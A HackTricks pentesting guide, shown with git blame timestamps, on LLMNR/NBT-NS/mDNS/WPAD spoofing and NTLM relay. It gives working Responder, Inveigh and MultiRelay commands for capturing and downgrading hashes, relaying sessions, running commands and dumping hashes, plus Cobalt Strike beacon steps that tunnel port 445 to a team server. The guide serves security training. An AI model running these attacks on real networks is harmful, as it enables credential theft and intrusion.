hacktricks/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md

151 lines
9 KiB
Markdown
Raw Normal View History

2022-04-28 23:27:22 +00:00
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
2022-04-28 16:01:33 +00:00
2024-07-18 16:21:56 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 16:21:56 +00:00
<details>
2022-04-28 16:01:33 +00:00
2024-07-18 16:21:56 +00:00
<summary>Support HackTricks</summary>
2023-12-30 20:49:23 +00:00
2024-07-18 16:21:56 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-07-18 16:21:56 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-02-07 04:06:18 +00:00
## Network Protocols
### Local Host Resolution Protocols
- **LLMNR, NBT-NS, and mDNS**:
- Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
- These protocols are susceptible to interception and spoofing due to their unauthenticated, broadcast nature over UDP.
- [Responder](https://github.com/lgandx/Responder) can be used to impersonate services by sending forged responses to hosts querying these protocols.
- Further information on service impersonation using Responder can be found [here](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
### Web Proxy Auto-Discovery Protocol (WPAD)
- WPAD allows browsers to discover proxy settings automatically.
- Discovery is facilitated via DHCP, DNS, or fallback to LLMNR and NBT-NS if DNS fails.
- Responder can automate WPAD attacks, directing clients to malicious WPAD servers.
### Responder for Protocol Poisoning
- **Responder** is a tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.
- It comes pre-installed in Kali Linux, configurable at `/etc/responder/Responder.conf`.
- Responder displays captured hashes on the screen and saves them in the `/usr/share/responder/logs` directory.
- It supports both IPv4 and IPv6.
- Windows version of Responder is available [here](https://github.com/lgandx/Responder-Windows).
2022-10-05 21:51:12 +00:00
#### Running Responder
2024-02-07 04:06:18 +00:00
- To run Responder with default settings: `responder -I <Interface>`
- For more aggressive probing (with potential side effects): `responder -I <Interface> -P -r -v`
- Techniques to capture NTLMv1 challenges/responses for easier cracking: `responder -I <Interface> --lm --disable-ess`
- WPAD impersonation can be activated with: `responder -I <Interface> --wpad`
- NetBIOS requests can be resolved to the attacker's IP, and an authentication proxy can be set up: `responder.py -I <interface> -Pv`
2022-10-05 21:51:12 +00:00
2024-02-07 04:06:18 +00:00
### DHCP Poisoning with Responder
- Spoofing DHCP responses can permanently poison a victim's routing information, offering a stealthier alternative to ARP poisoning.
- It requires precise knowledge of the target network's configuration.
- Running the attack: `./Responder.py -I eth0 -Pdv`
- This method can effectively capture NTLMv1/2 hashes, but it requires careful handling to avoid network disruption.
2024-02-07 04:06:18 +00:00
### Capturing Credentials with Responder
- Responder will impersonate services using the above-mentioned protocols, capturing credentials (usually NTLMv2 Challenge/Response) when a user attempts to authenticate against the spoofed services.
- Attempts can be made to downgrade to NetNTLMv1 or disable ESS for easier credential cracking.
2020-12-22 23:49:12 +00:00
2024-02-07 04:06:18 +00:00
It's crucial to note that employing these techniques should be done legally and ethically, ensuring proper authorization and avoiding disruption or unauthorized access.
2020-12-22 23:49:12 +00:00
2024-02-07 04:06:18 +00:00
## Inveigh
2024-02-07 04:06:18 +00:00
Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionalities similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script to a C# binary, with [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) and [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as the main versions. Detailed parameters and instructions can be found in the [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters).
2022-02-26 18:34:09 +00:00
2024-02-07 04:06:18 +00:00
Inveigh can be operated through PowerShell:
2022-10-05 21:51:12 +00:00
```powershell
2024-02-07 04:06:18 +00:00
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
2022-10-05 21:51:12 +00:00
```
2024-02-07 04:06:18 +00:00
Or executed as a C# binary:
2022-10-05 21:51:12 +00:00
```bash
Inveigh.exe
```
2024-02-07 04:06:18 +00:00
### NTLM Relay Attack
2024-02-07 04:06:18 +00:00
This attack leverages SMB authentication sessions to access a target machine, granting a system shell if successful. Key prerequisites include:
- The authenticating user must have Local Admin access on the relayed host.
- SMB signing should be disabled.
2020-12-22 23:49:12 +00:00
2024-02-07 04:06:18 +00:00
#### 445 Port Forwarding and Tunneling
2022-02-26 18:34:09 +00:00
2024-02-07 04:06:18 +00:00
In scenarios where direct network introduction isn't feasible, traffic on port 445 needs to be forwarded and tunneled. Tools like [**PortBender**](https://github.com/praetorian-inc/PortBender) help in redirecting port 445 traffic to another port, which is essential when local admin access is available for driver loading.
2020-12-22 23:49:12 +00:00
2024-02-07 04:06:18 +00:00
PortBender setup and operation in Cobalt Strike:
2022-08-14 12:59:30 +00:00
```bash
2024-02-07 04:06:18 +00:00
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
2022-08-14 12:59:30 +00:00
2024-02-07 04:06:18 +00:00
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
2022-08-14 12:59:30 +00:00
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
2024-02-07 04:06:18 +00:00
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
2022-08-14 12:59:30 +00:00
2024-02-07 04:06:18 +00:00
# Termination commands
2022-08-14 12:59:30 +00:00
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
```
2024-02-07 04:06:18 +00:00
### Other Tools for NTLM Relay Attack
2024-02-07 04:06:18 +00:00
- **Metasploit**: Set up with proxies, local and remote host details.
- **smbrelayx**: A Python script for relaying SMB sessions and executing commands or deploying backdoors.
- **MultiRelay**: A tool from the Responder suite to relay specific users or all users, execute commands, or dump hashes.
2024-02-07 04:06:18 +00:00
Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.
2024-02-07 04:06:18 +00:00
### MultiRelay Operation
2024-02-07 04:06:18 +00:00
MultiRelay is executed from the _**/usr/share/responder/tools**_ directory, targeting specific IPs or users.
2022-09-09 11:57:02 +00:00
```bash
2024-02-07 04:06:18 +00:00
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
2024-02-07 04:06:18 +00:00
# Proxychains for routing traffic
2022-09-09 11:57:02 +00:00
```
2024-02-07 04:06:18 +00:00
These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.
2022-08-14 12:59:30 +00:00
### Force NTLM Logins
2020-12-22 23:58:20 +00:00
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
2022-05-01 13:25:53 +00:00
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
{% endcontent-ref %}
2020-12-22 23:58:20 +00:00
2022-05-01 13:25:53 +00:00
## References
2024-02-07 04:06:18 +00:00
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
* [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
2022-04-28 16:01:33 +00:00
2024-07-18 16:21:56 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 16:21:56 +00:00
<details>
2022-04-28 16:01:33 +00:00
2024-07-18 16:21:56 +00:00
<summary>Support HackTricks</summary>
2023-12-30 20:49:23 +00:00
2024-07-18 16:21:56 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-07-18 16:21:56 +00:00
{% endhint %}